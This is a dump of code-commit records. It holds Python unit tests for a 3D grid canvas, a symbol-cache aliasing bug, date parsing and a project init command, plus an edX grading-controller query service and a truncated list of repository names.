canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
Add 3d grid canvas test.#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
# Check cooridnates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
<commit_before><commit_msg>Add 3d grid canvas test.<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
# Check cooridnates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
|
03f7fa8196d07be89f5ebf6a86c349db035ba82c
|
tests/test_symbol_caching.py
|
tests/test_symbol_caching.py
|
import numpy as np
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
For further explanation consider the symbol u[x, y] and it's first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
Add test for symbol cache aliasing
|
SymbolCache: Add test for symbol cache aliasing
|
Python
|
mit
|
opesci/devito,opesci/devito
|
SymbolCache: Add test for symbol cache aliasing
|
import numpy as np
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
For further explanation consider the symbol u[x, y] and it's first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
<commit_before><commit_msg>SymbolCache: Add test for symbol cache aliasing<commit_after>
|
import numpy as np
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
For further explanation consider the symbol u[x, y] and it's first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
SymbolCache: Add test for symbol cache aliasingimport numpy as np
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
For further explanation consider the symbol u[x, y] and it's first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
<commit_before><commit_msg>SymbolCache: Add test for symbol cache aliasing<commit_after>import numpy as np
from devito import DenseData, clear_cache
from devito.interfaces import _SymbolCache
@pytest.mark.xfail(reason="Known symbol caching bug due to false aliasing")
def test_symbol_cache_aliasing():
"""Test to assert that our aiasing cache isn't defeated by sympys
non-aliasing symbol cache.
For further explanation consider the symbol u[x, y] and it's first
derivative in x, which includes the symbols u[x, y] and u[x + h, y].
The two functions are aliased in devito's caching mechanism to allow
multiple stencil indices pointing at the same data object u, but
SymPy treats these two instances as separate functions and thus is
allowed to delete one or the other when the cache is cleared.
The test below asserts that if either of these instances is deleted,
the data on u is still intact through our own caching mechanism."""
# Ensure a clean cache to start with
clear_cache()
assert(len(_SymbolCache) == 0)
# Create first instance of u and fill its data
u = DenseData(name='u', shape=(3, 4))
u.data[:] = 6.
# Test 1: Create u[x + h, y] and delete it again
dx = u.dx # Contains two u symbols: u[x, y] and u[x + h, y]
del dx
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u
assert np.allclose(u.data, 6.) # u.data is alive
# Test 2: Create and keep u[x, y + h] and delete u[x, y]
dy = u.dy
u_h = dy.args[0].args[1] # Store a copy of the second variant
del dy
del u
clear_cache()
assert len(_SymbolCache) == 1 # We still have a reference to u_h
assert np.allclose(u_h.data, 6.) # u_h.data is alive
|
|
79895e372459b98c610640232d0f6d616cb86f82
|
tests/utils/test_strptime.py
|
tests/utils/test_strptime.py
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
Add test for the strptime util
|
Add test for the strptime util
|
Python
|
apache-2.0
|
rowhit/gitfs,PressLabs/gitfs,PressLabs/gitfs,bussiere/gitfs,ksmaheshkumar/gitfs
|
Add test for the strptime util
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
<commit_before><commit_msg>Add test for the strptime util<commit_after>
|
import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
Add test for the strptime utilimport datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
<commit_before><commit_msg>Add test for the strptime util<commit_after>import datetime as dt
from pytest import raises
from gitfs.utils import strptime
class TestDateTimeUtils(object):
def test_strptime(self):
date = dt.date(2014, 8, 21)
datetime = dt.datetime(2014, 8, 21, 1, 2, 3)
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S") == date
assert strptime("2014-08-21 01:02:03", "%Y-%m-%d %H:%M:%S", to_datetime=True) == datetime
date = dt.date(2014, 8, 30)
datetime = dt.datetime(2014, 8, 30, 1, 2, 3)
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S") == date
assert strptime("30 Aug 14 01:02:03", "%d %b %y %H:%M:%S", to_datetime=True) == datetime
date = dt.date(1970, 1, 1)
datetime = dt.datetime(1970, 1, 1, 13, 30)
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p") == date
assert strptime("1 Jan 70 1:30pm", "%d %b %y %I:%M%p", to_datetime=True) == datetime
with raises(ValueError):
strptime("31 Nov 14 01:02:03", "%d %b %y %H:%M:%S")
|
|
14f83b8eeaa53b45d243d9c5279749653ed83394
|
tests/test_commands/test_init.py
|
tests/test_commands/test_init.py
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
Test init commands - addition
|
Test init commands - addition
|
Python
|
apache-2.0
|
0xc0170/project_generator,sarahmarshy/project_generator,ohagendorf/project_generator,project-generator/project_generator,hwfwgrp/project_generator,molejar/project_generator
|
Test init commands - addition
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
<commit_before><commit_msg>Test init commands - addition<commit_after>
|
# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
Test init commands - addition# Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
<commit_before><commit_msg>Test init commands - addition<commit_after># Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import yaml
import shutil
from unittest import TestCase
from nose.tools import *
from project_generator.commands import init
class TestInitCommand(TestCase):
"""test init command"""
def setUp(self):
if not os.path.exists('test_workspace'):
os.makedirs('test_workspace')
# create 3 files to test init
with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:
pass
with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:
pass
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='commands')
self.subparser = subparsers.add_parser('init', help=init.help)
def tearDown(self):
# remove created directory
shutil.rmtree('test_workspace', ignore_errors=True)
os.remove('projects.yaml')
os.remove('project.yaml')
def test_init_empty_project(self):
init.setup(self.subparser)
args = self.parser.parse_args(['init'])
init.run(args)
# Should create 2 files
assert os.path.isfile('projects.yaml')
assert os.path.isfile('project.yaml')
|
|
7b65f56121f5bc7627890a057d377d6073ecf8d3
|
lms/djangoapps/open_ended_grading/controller_query_service.py
|
lms/djangoapps/open_ended_grading/controller_query_service.py
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
super(ControllerQuery, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
Add service to query controller for eta of submission and to check if name is unique
|
Add service to query controller for eta of submission and to check if name is unique
|
Python
|
agpl-3.0
|
Edraak/edx-platform,halvertoluke/edx-platform,BehavioralInsightsTeam/edx-platform,fly19890211/edx-platform,prarthitm/edxplatform,B-MOOC/edx-platform,xingyepei/edx-platform,jjmiranda/edx-platform,jruiperezv/ANALYSE,amir-qayyum-khan/edx-platform,mitocw/edx-platform,arbrandes/edx-platform,IITBinterns13/edx-platform-dev,10clouds/edx-platform,Semi-global/edx-platform,Edraak/edx-platform,ak2703/edx-platform,LICEF/edx-platform,fintech-circle/edx-platform,amir-qayyum-khan/edx-platform,EduPepperPDTesting/pepper2013-testing,LICEF/edx-platform,pdehaye/theming-edx-platform,alu042/edx-platform,tiagochiavericosta/edx-platform,gsehub/edx-platform,dsajkl/reqiop,cyanna/edx-platform,xuxiao19910803/edx-platform,playm2mboy/edx-platform,ubc/edx-platform,analyseuc3m/ANALYSE-v1,ESOedX/edx-platform,yokose-ks/edx-platform,kamalx/edx-platform,Softmotions/edx-platform,kxliugang/edx-platform,ovnicraft/edx-platform,eestay/edx-platform,Ayub-Khan/edx-platform,jswope00/GAI,tanmaykm/edx-platform,Unow/edx-platform,zadgroup/edx-platform,solashirai/edx-platform,simbs/edx-platform,ahmadiga/min_edx,mahendra-r/edx-platform,sudheerchintala/LearnEraPlatForm,praveen-pal/edx-platform,sameetb-cuelogic/edx-platform-test,torchingloom/edx-platform,Livit/Livit.Learn.EdX,bigdatauniversity/edx-platform,hmcmooc/muddx-platform,antonve/s4-project-mooc,dcosentino/edx-platform,cselis86/edx-platform,zadgroup/edx-platform,mahendra-r/edx-platform,shubhdev/edx-platform,devs1991/test_edx_docmode,vasyarv/edx-platform,SravanthiSinha/edx-platform,xinjiguaike/edx-platform,wwj718/edx-platform,eduNEXT/edunext-platform,ak2703/edx-platform,cecep-edu/edx-platform,knehez/edx-platform,dkarakats/edx-platform,zerobatu/edx-platform,ak2703/edx-platform,EduPepperPDTesting/pepper2013-testing,dcosentino/edx-platform,peterm-itr/edx-platform,mbareta/edx-platform-ft,DefyVentures/edx-platform,Softmotions/edx-platform,prarthitm/edxplatform,antonve/s4-project-mooc,utecuy/edx-platform,BehavioralInsightsTeam/edx-platform,shabab12/edx-platform,shubhdev/edx-platform,jazztpt/edx-platform,OmarIthawi/edx-platform,raccoongang/edx-platform,mcgachey/edx-platform,hmcmooc/muddx-platform,Shrhawk/edx-platform,doganov/edx-platform,chand3040/cloud_that,mahendra-r/edx-platform,msegado/edx-platform,fly19890211/edx-platform,LICEF/edx-platform,dsajkl/123,jelugbo/tundex,Ayub-Khan/edx-platform,J861449197/edx-platform,tanmaykm/edx-platform,BehavioralInsightsTeam/edx-platform,fly19890211/edx-platform,deepsrijit1105/edx-platform,cyanna/edx-platform,simbs/edx-platform,zhenzhai/edx-platform,JCBarahona/edX,eduNEXT/edunext-platform,kxliugang/edx-platform,ZLLab-Mooc/edx-platform,jonathan-beard/edx-platform,jbassen/edx-platform,mjirayu/sit_academy,teltek/edx-platform,devs1991/test_edx_docmode,msegado/edx-platform,jruiperezv/ANALYSE,alexthered/kienhoc-platform,OmarIthawi/edx-platform,appliedx/edx-platform,rhndg/openedx,RPI-OPENEDX/edx-platform,doismellburning/edx-platform,rue89-tech/edx-platform,atsolakid/edx-platform,edx/edx-platform,morpheby/levelup-by,kursitet/edx-platform,eestay/edx-platform,pku9104038/edx-platform,AkA84/edx-platform,don-github/edx-platform,Stanford-Online/edx-platform,jruiperezv/ANALYSE,beacloudgenius/edx-platform,cyanna/edx-platform,don-github/edx-platform,jonathan-beard/edx-platform,zubair-arbi/edx-platform,xuxiao19910803/edx,nanolearningllc/edx-platform-cypress-2,RPI-OPENEDX/edx-platform,beacloudgenius/edx-platform,wwj718/ANALYSE,chauhanhardik/populo,JCBarahona/edX,chrisndodge/edx-platform,ampax/edx-platform-backup,inares/edx-platform,EduPepperPDTesting/pepper2013-testing,mtlchun/edx,gymnasium/edx-platform,tiagochiavericosta/edx-platform,Lektorium-LLC/edx-platform,nttks/jenkins-test,Shrhawk/edx-platform,hamzehd/edx-platform,B-MOOC/edx-platform,nanolearningllc/edx-platform-cypress-2,pomegranited/edx-platform,mjirayu/sit_academy,appsembler/edx-platform,CourseTalk/edx-platform,caesar2164/edx-platform,JioEducation/edx-platform,kmoocdev/edx-platform,xuxiao19910803/edx,wwj718/ANALYSE,UXE/local-edx,unicri/edx-platform,syjeon/new_edx,Edraak/circleci-edx-platform,EDUlib/edx-platform,edx-solutions/edx-platform,pomegranited/edx-platform,mjg2203/edx-platform-seas,chauhanhardik/populo_2,cselis86/edx-platform,nanolearning/edx-platform,kursitet/edx-platform,abdoosh00/edraak,olexiim/edx-platform,jonathan-beard/edx-platform,kamalx/edx-platform,ZLLab-Mooc/edx-platform,tanmaykm/edx-platform,antonve/s4-project-mooc,hastexo/edx-platform,chauhanhardik/populo,MakeHer/edx-platform,stvstnfrd/edx-platform,romain-li/edx-platform,Edraak/edx-platform,procangroup/edx-platform,devs1991/test_edx_docmode,rhndg/openedx,utecuy/edx-platform,ak2703/edx-platform,eemirtekin/edx-platform,kxliugang/edx-platform,shashank971/edx-platform,chauhanhardik/populo,Edraak/edraak-platform,bitifirefly/edx-platform,gsehub/edx-platform,jbassen/edx-platform,LICEF/edx-platform,SravanthiSinha/edx-platform,nttks/edx-platform,zofuthan/edx-platform,franosincic/edx-platform,mjg2203/edx-platform-seas,angelapper/edx-platform,nikolas/edx-platform,Edraak/edraak-platform,Lektorium-LLC/edx-platform,cecep-edu/edx-platform,Edraak/circleci-edx-platform,jonathan-beard/edx-platform,IITBinterns13/edx-platform-dev,defance/edx-platform,pomegranited/edx-platform,cpe